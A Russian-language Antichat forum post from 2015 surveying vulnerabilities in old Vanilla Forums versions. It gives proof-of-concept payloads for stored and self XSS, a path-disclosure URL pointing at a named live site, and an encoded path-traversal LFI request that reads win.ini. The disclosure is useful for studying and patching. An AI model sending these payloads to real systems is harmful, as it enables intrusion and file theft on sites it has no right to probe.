Форумы [Обзор уязвимостей Vanilla Forums]

Discussion in 'Уязвимости CMS/форумов' started by psihoz26, 24 Feb 2015.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Vanilla <= 2.1.1 stored XSS в любом сообщении

    XSS exploit:
    Code:
    <img alt="<img onerror=alert(1)//"<"> 
    proof:
    [​IMG]

    Vanilla <= 2.1.1 Self XSS в черновиках

    Описание:
    Создаем тему с стандартным xss пэйлоадом в имени.
    Code:
    <script>alert(1)</script>
    Но вместо того чтобы отправить её, сохраняем в черновики.

    Рузельтат:
    Алерт при входе в "Черновики"


    Можно проверить это место на csrf...

    Vanilla <= 2.0.18.10 раскрытие локальных путей:


    Раскрытие бывает по адресу:
    Code:
    localhost/forums/setup/
    Proof:

    Code:
    http://chklst.ru/forum/setup/style.css
    Vanilla 2.0.17.1 - 2.0.17.9 Local File Inclusion

    Пример:
    Code:
    http://www.example.com/vanilla/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
     
    #1 psihoz26, 24 Feb 2015
    Last edited by a moderator: 25 Feb 2015